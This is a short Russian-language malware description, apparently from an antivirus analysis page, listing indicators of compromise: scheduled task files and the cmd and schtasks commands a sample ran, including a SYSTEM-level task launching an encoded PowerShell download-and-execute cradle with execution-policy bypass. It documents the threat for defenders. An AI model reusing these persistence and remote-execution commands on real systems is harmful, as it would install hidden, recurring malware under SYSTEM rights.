Техническая информация
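Файлы заданий Планировщика Windows (имена соответствуют заданиям Bluetooths, qXnHiEh и TTPDr из команд schtasks, перечисленных ниже):
- <SYSTEM32>\tasks\microsoft\windows\bluetooths
- <SYSTEM32>\tasks\qxnhieh
- <SYSTEM32>\tasks\ttpdr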
- '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\temp\svchost.exe %WINDIR%\qXnHiEh.exe&move /y %WINDIR%\temp\dig.exe %WINDIR%\hKQy.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\temp\svchost.exe %WINDIR%\qXnHiEh.exe&move /y %WINDIR%\temp\dig.exe %WINDIR%\hKQy.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE...
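- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0A...
  (Примечание: параметр `-ep bypass` задаёт для этого запуска политику выполнения Bypass, а `-e` передаёт команду в кодировке Base64 (UTF-16LE). Видимое начало строки декодируется как `IEX (New-Object Net.WebClient`, то есть задание, судя по всему, загружает код из сети и выполняет его от имени SYSTEM каждые 50 минут. Остаток команды на странице обрезан, поэтому адрес загрузки здесь не виден.)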
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn qXnHiEh /tr "%WINDIR%\qXnHiEh.exe" /F
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\TTPDr" /tr "%WINDIR%\hKQy.exe" /F